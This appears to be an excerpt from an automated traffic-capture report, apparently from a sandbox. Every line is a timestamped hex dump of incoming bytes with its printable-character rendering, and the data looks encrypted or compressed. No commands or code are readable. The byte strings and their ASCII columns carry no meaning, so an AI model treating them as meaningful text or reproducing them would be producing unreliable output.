                                                                                                                                                    2022-09-29 12:59:06 UTC10684INData Raw: a2 02 c3 cc 46 53 58 2e ee 8b 01 ae 7e 91 39 3b f9 da ea ba 2f e4 d0 e8 72 b8 e7 1a ab 03 78 fb ed 46 44 19 29 3a 52 37 89 82 bc 19 44 ac a4 63 ad 11 ee 4b 56 a2 29 6e e1 7d a4 7c 6d d1 a8 85 b5 79 f1 6e f9 af a7 e1 8c 49 1a c4 be d2 9b 6b 7e 15 c5 69 31 f4 79 20 8c 8f f2 3e ed 21 03 2d 09 dc a9 5f 4a 7d f5 4b c0 6d 8a 13 28 f6 02 a5 2f 39 bd 21 9a f8 3c 13 30 d4 3e 9d 1d a0 bc cf d7 fd 2c 3b da 32 d0 9e 1b 91 da 49 54 39 eb 3f b3 f3 82 cb 07 a5 c5 67 2b 41 4b 03 55 fe 21 e1 86 63 9b ff d1 ed c7 3f 57 ed 14 f8 df fa 8f 5d e8 08 80 f3 c4 bb 99 2e e0 25 3e cd a2 bd 98 44 ee 68 d6 96 82 9b 1f b1 22 40 2d 13 d0 01 c4 e1 99 ec 96 e3 2c 17 a9 80 28 6d 72 71 b6 67 f8 d3 63 3f e4 26 2e c9 6a 00 fb 12 ad bc ae b3 df 82 21 9a b3 23 c3 22 2b 63 0e 33 10 04 f0 a8 7a
                                                                                                                                                    Data Ascii: FSX.~9;/rxFD):R7DcKV)n}|mynIk~i1y >!-_J}Km(/9!<0>,;2IT9?g+AKU!c?W].%>Dh"@-,(mrqgc?&.j!#"+c3z
                                                                                                                                                    2022-09-29 12:59:06 UTC10685INData Raw: 98 3d cb 7a 93 ff 59 5b ef 69 63 03 f7 4e ef 04 c4 77 56 3d 50 ee c3 4a 8d 12 b7 d1 98 c4 71 ee a1 56 83 44 40 4a 82 67 83 ac 5b fc 84 dc 08 d9 69 aa 9b ec f0 26 f4 1d 5f 7c 26 f3 0b 5a 33 d8 c3 74 9e 51 8e c9 ae 6c 2c d3 c2 f6 0e 68 1f 18 70 a1 00 42 1f 45 9f ad 82 f2 2f 83 14 3f 41 f3 8a 18 1e d3 04 c6 33 5a dc b3 47 25 ae f3 eb 1f 04 cd 4c 3c 8e 66 bb a9 4a ae 9f f7 1e 09 7e c6 64 e7 26 01 a7 ef 94 ba 09 8a a0 59 3f 4c ac ca b6 ee f8 be 18 76 55 5d 68 3f 41 e7 64 e2 ee b4 e5 f0 7b a6 f2 51 48 08 42 d8 f3 11 44 6f 0e 1d 6f 1a 23 9b 54 0e 1f 62 6a be 09 17 ab 55 b4 a7 8e 20 a9 fe 4b 6f ff e8 a2 89 ec 12 f3 04 28 9d 67 a8 9f f4 e6 8f f8 e5 2e c2 ab db 9b 89 d2 cb 25 71 34 b9 a9 14 e3 8a ce 47 8e b6 91 3d 59 0e 2c 39 b5 d6 eb 39 61 4b e1 5e f1 65 3d d1 e3
                                                                                                                                                    Data Ascii: =zY[icNwV=PJqVD@Jg[i&_|&Z3tQl,hpBE/?A3ZG%L<fJ~d&Y?LvU]h?Ad{QHBDoo#TbjU Ko(g.%q4G=Y,99aK^e=
                                                                                                                                                    2022-09-29 12:59:06 UTC10686INData Raw: 37 6e 8c 8b 7e 3b d8 77 84 8c 17 c3 f6 c3 33 1c ad 4b ff b2 10 10 17 92 73 d8 f4 2b ee c7 25 a6 39 ec c5 80 58 f4 2b a3 a3 c5 be 5a 79 18 f8 d8 59 69 2b 12 85 4f d1 ee e8 21 e3 dd bd 0f 13 c8 a4 9a 04 52 dc 2d b3 2e 81 a6 01 96 4f 2c 9a 40 c0 34 be 8e 49 aa 62 2e 09 03 d1 19 c6 38 21 4f ee c2 10 1f 53 c1 f5 61 3e 02 d4 e3 8b f6 fa b5 c7 58 d4 44 90 04 8a 72 04 da 70 87 cb 42 f8 df 78 72 4b 7e cb 5a 44 ac b4 3f 62 ba 43 7e 51 4c 82 21 51 f2 da e7 9c 68 cb f7 1a 0d 40 ae e1 73 53 7b 12 e2 aa 91 c3 79 59 78 1b 9d 5f 53 68 d7 0b 50 d1 ed b2 1b ae 22 66 a3 21 f2 54 3f 2e 89 d7 ed 81 54 b0 84 18 63 50 41 fb c1 e1 12 61 ae 56 0d 16 d2 1e f3 b8 64 94 8e 68 ae ed f6 eb a6 4e 28 4d a0 1e 73 92 59 0e 8b 22 54 cb 5e 19 dc 1d 1c a0 ad 99 e8 2e 48 b6 0c b5 92 69 b3 0e
                                                                                                                                                    Data Ascii: 7n~;w3Ks+%9X+ZyYi+O!R-.O,@4Ib.8!OSa>XDrpBxrK~ZD?bC~QL!Qh@sS{yYx_ShP"f!T?.TcPAaVdhN(MsY"T^.Hi
                                                                                                                                                    2022-09-29 12:59:06 UTC10688INData Raw: d8 3a 4e df 5a 63 d6 c1 93 b8 28 ef 36 97 0e 26 0c 8f eb 47 af f9 b0 34 e8 2f 09 9b 72 71 ef dc 63 df ad 52 42 37 cc 13 65 a6 4f 19 df 41 01 c0 27 d9 db 68 2f f1 bb 07 0c 7d 65 2d d3 14 2a ad 90 e4 2a 9e 82 ea 23 94 32 eb ba 0e af a5 30 66 b7 c8 15 f0 74 3d 7f 89 31 fd d9 b0 5a 75 dc a8 33 a2 5c b0 3d ce 1e 95 f5 ff be 48 70 f7 47 95 53 5e fc 0f 17 1e 0c 15 86 19 05 a5 5c 23 f0 38 2b be 40 d5 e3 a3 43 7c 93 a8 9d 36 53 b7 59 ca ce ae b1 dc 93 19 51 21 04 4c ac 8e 79 8b a1 31 a6 ab 95 7b 40 28 67 4a f8 a9 c2 69 b6 09 6c 4f e2 ba f0 b8 f2 a4 93 be 3d 7c 3e a4 6d c8 ad 1e 32 1f e1 86 cf 5d c4 60 74 a1 26 70 17 5a 2f 33 4d 26 7a a8 99 22 69 ac bd 22 57 46 d9 cb ae 64 38 60 bd e3 8f 61 c2 bf ef 2b 12 c6 00 b8 67 c3 a0 da bd da a1 b7 b1 6b 7a bd 0e f3 5b 37 77
                                                                                                                                                    Data Ascii: :NZc(6&G4/rqcRB7eOA'h/}e-**#20ft=1Zu3\=HpGS^\#8+@C|6SYQ!Ly1{@(gJilO=|>m2]`t&pZ/3M&z"i"WFd8`a+gkz[7w
                                                                                                                                                    2022-09-29 12:59:06 UTC10688INData Raw: bc ea 4b 9a e6 66 5e eb e0 f1 9d 91 38 2a 1e b7 26 0d 33 81 fe 18 b0 62 41 aa c6 ec 87 d3 8a 43 8d 15 98 80 b2 ed 72 75 73 3c 5b d4 d4 bb bc 0e 52 42 cf a5 cc 8f 9e 2c 5b a4 90 cf 49 4c 2a bd dc 4a ec a4 22 07 d6 7e 8c 4c 4b 9f eb c1 f5 b3 60 5d a9 09 30 cd 29 37 7a 61 7c 49 fe 5f 1a 5d af 7d fb 06 a1 aa 83 16 13 5e ee 33 ba f3 15 86 7e fe 50 a6 87 98 40 6f 9b 44 e4 d6 ad eb 47 3d 63 82 58 2a 83 10 56 71 b2 02 68 9b 44 d0 7d 72 14 9f 0e 9e b5 3c b9 4a f1 87 68 93 7f 8a 99 64 6e 78 97 02 d7 ea 58 4e bd 75 80 0b a3 69 2c d8 ef 49 08 f7 6e 08 48 41 7c 17 2a 2b 28 00 e7 0e 01 fc 7b ad bf a0 7c 5c e8 25 d0 e7 de f0 48 33 50 d0 0f 65 00 20 45 92 c1 8d 17 ff 4c cc f9 8d d7 8e 5a a7 a3 93 fc 7a de f3 8d 95 69 85 b4 96 05 cf 12 90 c0 dc 8e bd d3 da f9 6e 84 66 6b
                                                                                                                                                    Data Ascii: Kf^8*&3bACrus<[RB,[IL*J"~LK`]0)7za|I_]}^3~P@oDG=cX*VqhD}r<JhdnxXNui,InHA|*+({|\%H3Pe ELZzinfk
                                                                                                                                                    2022-09-29 12:59:07 UTC10704INData Raw: ef c7 ae 79 f6 82 fe 27 f5 de cc c2 70 78 c4 2b 39 1c 1a 14 cf 70 d0 7d ff e3 af 49 4f 20 71 c4 1c 25 71 e5 c0 b6 7f c5 77 d0 c7 ea df 29 06 58 45 11 58 63 15 c0 d9 63 7b cc 69 8a cb 3c 22 c0 c6 7f ee d7 10 39 91 be 29 25 d4 ac 3b 4d 62 74 e0 a1 6e a7 1e 6f 20 80 87 9f 64 01 3f e1 18 cd e1 b5 37 c3 46 de c3 0c a6 bc f6 29 6d 79 5e 65 2a 1a fa f7 25 37 45 c4 90 b2 24 cd af ef 53 47 31 f5 b1 f5 10 d2 cc 4f 23 64 9f 76 59 37 31 b5 c7 ed 70 68 d8 8e 7e a4 51 10 58 c5 8e 8a c9 ae 3a 9d e4 f3 45 ba 58 50 c3 69 1d 76 96 62 99 35 57 6e 6f 02 fd 05 7a 53 15 85 c5 a1 32 f4 45 fe 8c 4d ae dd 54 48 a5 f4 37 c7 2e 47 e0 ed 43 76 46 95 74 1b 6e 77 8c cf 4f be 9e 6a 94 e6 f1 f7 6d 9b 77 d0 f3 33 91 4c 62 37 5c 14 46 fb 92 ef 1f 61 c9 51 08 a3 49 71 79 a7 c9 ef 5e 3e 87
                                                                                                                                                    Data Ascii: y'px+9p}IO q%qw)XEXcc{i<"9)%;Mbtno d?7F)my^e*%7E$SG1O#dvY71ph~QX:EXPivb5WnozS2EMTH7.GCvFtnwOjmw3Lb7\FaQIqy^>
                                                                                                                                                    2022-09-29 12:59:07 UTC10720INData Raw: 78 78 6e 8f 21 3d b7 d8 49 82 de 6b e3 67 12 19 a2 af 50 ee 00 73 28 15 0c d8 ed ec ca d1 e3 0e 89 8c 5d 4b 57 8d 3f 53 2f 49 8a 85 b1 c8 68 d3 05 3d 00 41 3f 4f 8c cd 51 09 f9 dd 7d 1a fc 5f 69 18 12 33 3d d2 8e 6f 00 32 69 f1 29 0a 3d 5f 5c 30 83 83 07 af 4f 6d e0 dd 66 7f aa 02 07 ae d0 8d 1f 24 42 1b 32 2a 0b 40 84 8a ca bd e0 f1 5a 47 cb 7c 8f bd 0e ca ae 7e 8b 53 a1 66 4a 34 18 99 be 4c f7 73 63 25 1f 7a 70 23 05 07 95 37 06 98 75 83 30 27 ce eb fd aa 37 3d df 10 ad 69 fe 71 3a 04 6a 07 f2 be 8b d7 f1 34 80 15 02 cf a1 27 70 04 ab eb c6 75 5c ec 28 43 ad cc 88 f1 9f 95 f6 31 06 1a b1 ad f8 e9 5e fb 63 14 6b 09 53 1f 74 5f b9 3d dd 6c d7 56 23 51 56 6d c2 c7 a1 7f 54 cc 55 fa 54 23 df 2f 93 9f bc 9e b7 11 f5 68 ed 32 c4 69 77 25 16 c0 ba 96 b0 e9 b4
                                                                                                                                                    Data Ascii: xxn!=IkgPs(]KW?S/Ih=A?OQ}_i3=o2i)=_\0Omf$B2*@ZG|~SfJ4Lsc%zp#7u0'7=iq:j4'pu\(C1^ckSt_=lV#QVmTUT#/h2iw%
                                                                                                                                                    2022-09-29 12:59:07 UTC10736INData Raw: 4e 66 1f 75 85 15 14 b0 cb 53 12 11 57 60 31 e5 f9 6c 54 d3 9b 99 d2 b2 39 fe be 3a 0f 84 38 5f 1f b0 2c e3 da d3 f9 a6 4d 50 ae 2e 88 7e 3a 9f 0c fe 03 19 d5 50 8f e1 5d fc 53 be 36 c0 49 0a a5 60 d8 ca 4f 9f 64 53 60 14 1d e0 00 3c 02 2b f0 33 99 8b 05 64 fb 9d c8 8f 57 62 c4 29 25 be 71 ec fa 50 8f 6f f1 81 b9 bf c0 fc 48 33 b8 83 51 f4 40 00 c2 0a d8 33 87 70 76 30 0f f3 97 74 02 89 f5 36 94 6c e1 0a 5e 17 73 b6 d3 c9 6e 14 fe 3a ce c8 d3 a4 98 89 df 1e 4d e9 8e cd 61 67 b2 80 26 f9 42 3c f6 fe ba dd 6b 46 44 92 ef 10 b7 be 53 95 2a 59 f5 de 1e b3 7d 0f 53 59 11 e7 fa 6e 21 5a fb 8e 04 14 b6 52 8e 9c 83 ce ec cc d6 2c 9b e6 0a 29 4b 39 1f e8 bb 75 67 4b bf 20 a5 4a 2e 00 45 20 f1 9f d1 48 8e fc 0d 79 ad 60 97 ee 19 64 35 6d 14 e7 37 5d 9e fe 97 7c f0
                                                                                                                                                    Data Ascii: NfuSW`1lT9:8_,MP.~:P]S6I`OdS`<+3dWb)%qPoH3Q@3pv0t6l^sn:Mag&B<kFDS*Y}SYn!ZR,)K9ugK J.E Hy`d5m7]|
                                                                                                                                                    2022-09-29 12:59:07 UTC10752INData Raw: 32 56 73 26 f7 50 11 52 6f de 40 1b 05 bc 38 47 46 90 cd 74 4e ff e1 22 f4 3f 0f 6a f4 3e b4 1a db fb eb 91 34 a5 cc db 0e c1 82 92 25 b2 df 02 2e c4 3c f5 6b c9 a6 cc 07 a2 3d e5 03 af 44 1b 31 32 20 a2 5d b6 19 f3 cc e8 71 32 3f 79 c2 3d ae de 8c 74 e1 c2 b8 3e c9 f1 31 fa c6 51 02 76 d3 18 d2 4e 41 55 a2 3d 95 6a 49 b0 d8 cc f9 fc fa e4 68 c4 11 96 51 38 ee f4 3b c1 47 8f b7 72 42 c9 2b 4c df 80 e8 fe 8f d0 a6 84 2c c2 32 18 10 43 31 bd 14 16 12 ed 91 ae ae 2b 19 8f a5 18 0d e9 54 01 96 55 39 d3 e1 bd df e0 31 4d b7 ca 9b 42 92 3b 00 f8 14 2d a0 b6 f1 31 63 2d 1d 05 80 4a 86 68 2c 16 45 e7 74 9e be ea 8b e1 25 2a fe c5 41 31 66 8c e1 46 37 1d 02 5d c9 cd 79 58 86 2b a1 b0 56 e1 0c 5a b5 cd a2 f4 e9 71 a2 11 4f a0 2e 5c 2a 7e af da ca f6 68 b8 63 c4 46
                                                                                                                                                    Data Ascii: 2Vs&PRo@8GFtN"?j>4%.<k=D12 ]q2?y=t>1QvNAU=jIhQ8;GrB+L,2C1+TU91MB;-1c-Jh,Et%*A1fF7]yX+VZqO.\*~hcF
                                                                                                                                                    2022-09-29 12:59:07 UTC10768INData Raw: e3 a3 7c d4 e6 d1 b9 da b8 20 d7 0d 23 54 0f 95 16 11 da 12 e7 66 b3 57 0a e6 8b 64 9a c7 9c 76 69 69 e3 7a ec 35 c4 d1 f6 b8 5f e0 10 14 c8 7e f9 75 43 de cb da 3b 94 27 48 4e 88 b4 41 4f 50 c8 22 5a 7e bc b7 55 4f 04 b3 14 2a fd 6d 86 17 f9 d4 fa a7 8d 22 af eb be 6b 00 46 b5 a7 ff 31 0e 14 65 a0 ec bc c6 a5 45 01 85 97 5f 7f a6 92 a0 b8 43 40 5e 43 67 da a2 f4 72 6c 6d b2 91 f1 3c 9f b6 dd 19 8e b9 5b 17 76 77 f4 e6 bf 13 97 95 17 24 b3 26 55 e3 15 60 69 cb a0 e5 aa 7e 36 99 3b 02 b8 0a 51 7c 67 7b cd 53 81 3e d8 86 1f 5d f3 f1 70 51 78 60 6d 9d 12 a3 c4 bb d0 10 9a 3a 64 4d 1c 93 f5 44 3f 75 30 05 6c b6 ec 30 c8 71 02 c9 58 a4 94 7c c6 10 94 3c 5e 8a f2 c3 4f 88 12 82 16 fd b2 2c 75 02 3c bb 08 82 91 f4 28 8c 4c 42 7d f0 30 ee f6 f2 1f b2 20 6e 8e 7a
                                                                                                                                                    Data Ascii: | #TfWdviiz5_~uC;'HNAOP"Z~UO*m"kF1eE_C@^Cgrlm<[vw$&U`i~6;Q|g{S>]pQx`m:dMD?u0l0qX|<^O,u<(LB}0 nz
                                                                                                                                                    2022-09-29 12:59:07 UTC10784INData Raw: 6b 36 b6 e8 13 43 96 36 b6 5d 35 e3 1e 4d ea ef 2a 20 48 f2 67 bd 26 04 54 06 ec 2f 9e 0d 25 55 92 ce aa 66 1f 14 f9 62 56 5d 79 a0 53 2b 7d 7f 7f f1 99 bc 4f e0 95 7e 33 f9 f6 98 ac ac 4d 3a 42 58 df 8e c2 fe dd 12 eb e2 d9 58 2c 29 34 2b 15 72 10 b0 a9 1f 2b ad c6 27 a2 c7 8d 5a b3 9e 06 1a 08 93 b6 d8 af bf b7 fc 1f eb da 4d 10 19 d9 9e f3 2e 0b d5 fd bc a6 d5 ba dd 67 1f 5f b3 03 5a b1 a3 86 d2 01 c9 00 58 a9 52 ca 6b 5a c7 6e d0 4d 84 02 41 0c 36 aa 17 3b d5 49 82 ae 1e ef 8c 56 f5 a3 7e 90 e9 0c e9 e3 97 5b f1 9c ab d8 ec 7e 81 a7 9c b4 9e 2d 75 d9 0f 5f 9f 17 ed 17 7f 3c a4 33 b4 1a df 9d 70 90 7c 84 3f 7c ac 51 51 a6 0c 60 e3 94 f5 05 e1 96 8f 8f ea b0 52 e9 d8 0a 25 0b c0 af 38 60 51 2d 5c e8 a6 e9 26 0a b6 44 be a7 71 ea 9b 36 46 dd 10 01 3b e6
                                                                                                                                                    Data Ascii: k6C6]5M* Hg&T/%UfbV]yS+}O~3M:BXX,)4+r+'ZM.g_ZXRkZnMA6;IV~[~-u_<3p|?|QQ`R%8`Q-\&Dq6F;
                                                                                                                                                    2022-09-29 12:59:07 UTC10800INData Raw: 06 09 a9 06 01 e5 2f d9 89 c3 7f 5e a6 73 6d f7 35 77 ad 31 78 00 c9 88 b9 16 27 58 0a 55 f5 60 e5 40 c8 1d 29 d1 21 e0 42 51 ea 0c 75 50 b4 8f a2 b6 76 66 fe 23 5e b9 9f 55 39 de ae e3 15 60 1a e5 5b 31 f9 87 19 8a 95 6b 9a f4 66 21 ab f0 cb 19 c8 0e cb 45 50 0e 59 5a bd f5 02 f2 84 b0 41 33 07 64 a4 20 8b d4 f5 28 b9 ac 86 db 38 8f 14 e7 e9 6d 48 cc cb a9 65 8b d6 b0 6d ba 34 29 19 aa 15 52 02 05 de c0 03 34 e2 d8 79 c3 a0 4b ec 44 a2 1c b9 9b b0 6b 0a 7e ed b6 e3 1c 42 1c cc b5 28 8b 1d 47 0b a5 67 ab 69 28 6a b8 34 9c de 62 f9 c5 e9 9a 49 3d 45 99 e0 21 78 6f 7e 55 d5 90 4e ec 1f 54 e6 23 83 a6 6c 08 09 e2 ba 03 8e 7d 9c d7 9b 90 f4 7c cb c8 a9 86 20 5c 5b 53 c3 52 56 39 6f a7 05 92 77 b2 6f 9e e5 aa 56 bb 04 55 9d e6 b0 3e f3 f8 36 64 87 8a e0 5c 19
                                                                                                                                                    Data Ascii: /^sm5w1x'XU`@)!BQuPvf#^U9`[1kf!EPYZA3d (8mHem4)R4yKDk~B(Ggi(j4bI=E!xo~UNT#l}| \[SRV9owoVU>6d\
                                                                                                                                                    2022-09-29 12:59:07 UTC10816INData Raw: 9e 4d c3 40 46 71 8d a9 94 fc 31 c0 14 4f b4 4c a1 c4 6e 5b 51 0a 6c 33 6a 42 09 e3 3e 80 80 84 91 c1 19 8f 3a 24 6b 12 ff 08 a3 9d cb 9f 4d eb ef 58 54 c7 b8 0e 51 85 a1 aa ff 83 50 fa ba 35 df 14 cd cd 4e 85 66 e4 50 38 de 68 78 7e 3d 09 94 2b 0e 08 24 09 c1 15 15 49 14 1b d8 7f 7e 8d 88 a1 d8 e4 81 dd 57 4b 03 fa 2c 6d 2d f1 7b 20 ed 36 bc b7 b2 60 1c 66 c4 26 1f 5b f2 6a 63 69 e5 d5 b2 ea ac 14 e6 a3 7d 53 b0 72 48 dd 08 0b ac bd d6 7b c7 ea bd 64 7b e9 22 75 af e1 41 4f be 42 9a c9 c7 69 f7 9f 5c dc cd 13 e1 de 3c e0 b6 c0 de f4 3c e6 6a 4a c2 7a 2b b0 9c b4 6a 30 ab 4e 44 4c e6 c2 43 4b af 48 c7 23 f5 2e 16 4e 51 98 dd c0 c4 18 45 6a f9 a5 90 a9 2d 73 09 7a a8 4b 38 73 f6 7c c8 fd a8 69 0a da 42 ca 8c a3 f9 4b 75 54 d2 f9 41 3d 36 64 50 ab c4 b4 c6
                                                                                                                                                    Data Ascii: M@Fq1OLn[Ql3jB>:$kMXTQP5NfP8hx~=+$I~WK,m-{ 6`f&[jci}SrH{d{"uAOBi\<<jJz+j0NDLCKH#.NQEj-szK8s|iBKuTA=6dP
                                                                                                                                                    2022-09-29 12:59:07 UTC10832INData Raw: 21 b6 2d 3c 12 c5 11 b2 8a c8 1e c7 18 07 f3 38 4a 11 8f 25 ed 9b 29 ca 70 96 e5 b5 06 85 ad 1c 3e 32 f1 c2 7c d5 11 4c 6b d9 c7 25 2c 4f a8 d1 4d 66 b8 0e 6c 5e 6b ba fc 09 87 48 c4 1e 85 86 da a1 4c 1a 70 8b c3 1d bf 09 5d b3 56 9f cc ed cd cb d0 8f b1 7b a9 de eb 9a 44 53 9e 93 45 c6 7d e2 5c f2 0e ed d8 57 cc ef 9e 7e 3d fa 3c 1e 9c e6 29 8f f2 a3 d9 d2 78 82 46 8e 55 6f 1f 23 42 4c 8a 19 04 67 e9 f0 62 9b 6b 02 ac 29 8b 84 0d aa 4d 73 27 15 1f 00 03 65 1f 08 7d 44 4a d7 e2 a2 58 d7 47 39 a3 db 21 69 8a 79 af c9 0b 10 8c d8 6f 0d e6 58 1a 97 ae dd 49 96 0e 1f 44 fb bc 9e 93 33 db a1 ca 35 c5 c0 2c 02 c4 6e c3 69 9e f1 f3 0b 74 7f a6 d6 05 fd dc c6 9f 07 0a cc 30 0c c0 eb 1e 11 2b 88 ed 41 16 51 32 3f ec 17 4a ba c8 ca a9 f6 d5 73 e6 43 ec 48 1c 29 0c
                                                                                                                                                    Data Ascii: !-<8J%)p>2|Lk%,OMfl^kHLp]V{DSE}\W~=<)xFUo#BLgbk)Ms'e}DJXG9!iyoXID35,nit0+AQ2?JsCH)
                                                                                                                                                    2022-09-29 12:59:07 UTC10848INData Raw: fa 9c 3d 5c c8 ab 71 0c 80 42 09 d6 70 e1 f8 90 60 55 42 e0 54 96 ab 96 9b 66 32 8d c7 78 50 88 0c a1 6e 7e eb bb bf 9e 49 50 59 67 62 75 de 4b b3 86 43 46 dd ba cd b1 6d 90 76 5e e4 ad d2 89 37 c1 f3 7b 15 d7 38 a9 af 2d 0f 57 bc 9b 93 b2 aa 33 05 09 af d2 85 72 87 f3 a9 73 3d 7e 7e be 82 dc 8a 8a ff 61 a5 80 c2 10 d4 cb e1 20 58 69 d6 91 16 0d e8 c8 37 79 5d 2f 47 60 20 11 69 4c 2d 84 c9 58 5d d2 30 95 cb 17 6f 88 c3 32 c3 b9 07 c1 27 f0 07 3c c6 f6 cd e6 ce 6c ad a5 c9 0f 65 aa b2 65 a2 54 c1 b6 0d f7 0f 96 b3 20 6a 94 cc fa e1 07 e5 73 dd ed 3c 59 f6 94 44 73 02 a8 45 ed 24 0f db 45 1b 6f fd 97 a2 3a 74 b3 c9 41 75 ca ef dd 67 93 ca 02 ee b2 74 f8 37 36 a7 18 ab 22 39 65 1d a5 4b 7c de 74 01 0f f5 d1 2a 37 d1 35 83 66 c2 5e 4c 51 f3 2b 58 fb 70 36 37
                                                                                                                                                    Data Ascii: =\qBp`UBTf2xPn~IPYgbuKCFmv^7{8-W3rs=~~a Xi7y]/G` iL-X]0o2'<leeT js<YDsE$Eo:tAugt76"9eK|t*75f^LQ+Xp67
                                                                                                                                                    2022-09-29 12:59:07 UTC10864INData Raw: 58 cb 79 79 10 28 fb 2b b2 8c a6 b4 81 cb be 67 d0 5f ca cc 3b 89 9e 59 b2 95 f7 0d 35 ad 2f 03 ab 35 a5 c0 3a 5d ab 03 e3 df ee b6 03 d5 40 59 3e 20 67 82 8c cb 59 06 d0 47 32 5c ad e1 22 29 74 3e 0f 0d da 9e fe 25 50 72 9f b0 ff b6 6c e8 65 db ac f8 36 2a 95 e5 6e 5b 4f f4 3e 7b 70 bf 18 c2 e4 9b 1c 5f b0 66 8a a2 af 0f a8 41 dd 8c c4 79 17 7f 10 bc 50 0b 72 99 86 fd 93 de 0e 3c db f2 96 f7 54 d0 98 f3 b1 0e bf 02 91 b2 79 0f be d6 e0 c0 5b a4 bd 02 78 5c 11 03 88 4e a7 3b 82 ef 38 d3 ee ae 22 30 6c da 5c 93 fe f7 6a c8 6f 90 ee a8 14 75 fe 8f e9 80 1a 4f 04 21 2c 34 be 7a 0f fc cb 27 27 46 e6 bb 09 71 c2 d2 99 65 59 89 cd cf 03 4d 9c 0e 70 f1 d0 73 a8 57 fd 73 ca e7 a9 0f 72 6b 56 99 72 04 af 80 90 ea c8 00 d5 f6 63 ab 1e 7e 67 15 69 e0 e6 9a 11 3a 51
                                                                                                                                                    Data Ascii: Xyy(+g_;Y5/5:]@Y> gYG2\")t>%Prle6*n[O>{p_fAyPr<Ty[x\N;8"0l\jouO!,4z''FqeYMpsWsrkVrc~gi:Q
                                                                                                                                                    2022-09-29 12:59:07 UTC10880INData Raw: 0f 26 2e d8 13 3c 80 35 f2 66 bc 9d 50 92 37 8f 68 eb b0 f1 84 4a a6 6b 9d 2d 39 19 fe c1 ef 6f 0c 81 44 ac 33 75 d8 1e 16 1c 64 f7 f4 04 3a e6 8f 05 38 9d 35 ce 40 2d d8 d5 71 7c 1d 88 f1 f1 a3 85 bd 32 55 76 f1 9f b7 64 84 5d 50 20 87 37 67 14 58 9e a8 db d2 51 ec 84 d9 ee 6d 0f 79 bb 3d 80 19 ab 07 de 14 5d f8 7a 30 da 34 89 f4 c8 4c eb cf 99 f6 e4 b1 b3 b3 05 2f 63 72 9d d8 11 29 54 59 14 bd c9 fe 6e 5c 73 d5 b6 d2 da 45 9e 00 a2 91 44 65 45 91 a4 a1 4e 08 3b 2d 95 11 81 a3 c6 96 46 d6 39 ec cf 9a f0 74 de 48 84 3f 82 a6 f2 ad 34 ae ed 52 e1 1f 0a 2f 03 60 b9 2e 45 f9 73 2e e6 da 24 4e f8 61 5d 6d 52 ae 2e 76 f6 e0 0c ab a7 0c ea 9a d9 1b c8 d1 b4 a7 62 fb 52 bb 23 5c 38 8a aa 75 63 3d 8c dc 97 39 f7 07 0d c5 d7 d0 97 9f fd c9 77 ac 23 02 5d a4 53 ca
                                                                                                                                                    Data Ascii: &.<5fP7hJk-9oD3ud:85@-q|2Uvd]P 7gXQmy=]z04L/cr)TYn\sEDeEN;-F9tH?4R/`.Es.$Na]mR.vbR#\8uc=9w#]S
                                                                                                                                                    2022-09-29 12:59:07 UTC10896INData Raw: 82 ae 07 9a 6e aa 0a 57 af be 0d e5 aa c4 c9 e9 c1 f3 03 e5 c0 af 4c 8f 13 a4 30 61 ac 29 f4 2d b3 14 46 50 aa 94 84 ac 4a fc 31 a2 4a bf 84 e6 f3 19 27 2d 64 ed 05 05 42 d3 6e ae 05 38 b0 9a d6 88 c8 8d 07 2e dd 65 88 ce 16 87 79 51 af aa 46 78 3b e9 30 2b 2a ae 93 58 fc e4 ce 71 05 09 c5 9c 7f 98 a0 54 22 c7 ce 85 c1 de 9e 21 2a ec 58 aa a8 6a c2 84 d4 d4 37 0e 21 fb e0 d4 2f a8 74 16 a6 92 7b d4 71 34 47 f9 23 46 5c bc 16 3d 1a a4 f4 c5 6f f5 0b 4f cf a4 85 c5 8d 0c 73 76 9c 4d ed 51 1b 08 56 d1 a0 cd 33 93 f7 ea 74 ce 97 a7 36 23 ef ed 0c 81 20 8b ff c3 6f e3 5f 7d b4 c0 5f 0d 7f 28 23 c8 53 bb 99 eb 44 33 83 fa 73 8e b7 5e 6b 01 a8 22 a5 a1 ea cc 6a fa 30 a0 58 6d 43 8b e9 c2 5e da ac e7 14 ca d1 ee d0 1f 9a e5 0f af 78 f6 d8 3e 9d eb ac 9a 0e ef 4f
                                                                                                                                                    Data Ascii: nWL0a)-FPJ1J'-dBn8.eyQFx;0+*XqT"!*Xj7!/t{q4G#F\=oOsvMQV3t6# o_}_(#SD3s^k"j0XmC^x>O
                                                                                                                                                    2022-09-29 12:59:07 UTC10912INData Raw: 4c 2a 4f 1f 6e a5 a3 e5 e8 aa 64 8c a2 74 b2 21 f2 e7 3e f6 a5 f5 9f 4d 38 6f 4a b0 47 dc 7f 59 ae 76 86 a1 22 38 a4 fc dd 6d 42 a2 6e 4f 84 95 81 61 f0 3d 0f 78 0c f0 90 d3 0e f9 87 6c 50 c1 32 ce 05 ff 69 11 66 a2 a6 39 3c 10 7d ef c9 e1 0f d0 bd de 72 42 a9 21 57 0a f4 a6 a8 4e f9 08 07 f4 b2 ca 71 cd c5 4e a7 71 f0 2f 60 5c c5 d3 9e d4 1c 32 8b 48 22 39 aa 40 2f f7 cb 96 6f f7 28 f9 c2 0d 01 33 01 c1 69 98 c3 3c 55 19 34 9e 52 be 6a 9f 3c be c6 c3 10 c6 f5 76 0c f5 bb 48 2a fd df 2c 29 6e ea bb 39 69 eb f4 b7 18 ad ac 6c 91 71 01 3b e9 0b bc 56 c3 15 0d cc a5 31 8e 2e 07 ad a6 b9 f2 e6 2d 97 f6 f8 80 59 0b 77 7d 85 81 80 51 1e 2a 82 1d 9d 0c 14 54 58 31 0b c0 55 9f 27 6e 25 18 79 fe 14 7a 49 dc 1a f0 9c ce b6 43 c8 32 cf 9a 45 51 e8 d6 29 45 fe c5 e4
                                                                                                                                                    Data Ascii: L*Ondt!>M8oJGYv"8mBnOa=xlP2if9<}rB!WNqNq/`\2H"9@/o(3i<U4Rj<vH*,)n9ilq;V1.-Yw}Q*TX1U'n%yzIC2EQ)E
